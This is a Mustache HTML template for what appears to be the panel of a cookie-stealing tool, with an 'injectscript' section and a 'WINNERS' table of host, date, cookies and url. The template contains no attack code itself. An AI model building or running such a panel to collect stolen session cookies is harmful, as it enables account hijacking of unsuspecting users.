{{>doctype}}
<html>
    {{>header}}
    <body>
        {{>mainmenu}}
        {{config}}
        <ul>
            <li class="injectscript">{{>inject}}</li>
            <li class="getform">{{>getform}}</li>
            <li class="getwinners">
                <h1>Get &quot;WINNERS&quot;</h1>
                <div class="num">3</div>
				<table id="rows" class="rows">
					<tr class="head">
						<th colspan="4">
							{{>pager}}
						</th>
					</tr>
					<tr class="head">
						<th>host <a id="byhost" class="asc" href="#byhost"><img src="{{img}}/1px.gif" /></a></th>
						<th>date <a id="bydate" class="desc" href="#bydate"><img src="{{img}}/1px.gif" /></a></th>
						<th>cookies</th>
						<th>url</th>
					</tr>
					{{#has_winners}}
                        {{#winners}}
                            {{>row}}
					    {{/winners}}
					{{/has_winners}}
					{{^has_winners}}
					    <tr>
					        <td colspan="5">no data</td>
					    </tr>
					{{/has_winners}}
				</table>
            </li>
        </ul>
        <div class="clear"></div>
        <script>
            var config = {
                templates : "{{tpl}}"
            };
        </script>
        <script src="{{loader_js}}"></script>
    </body>
</html>
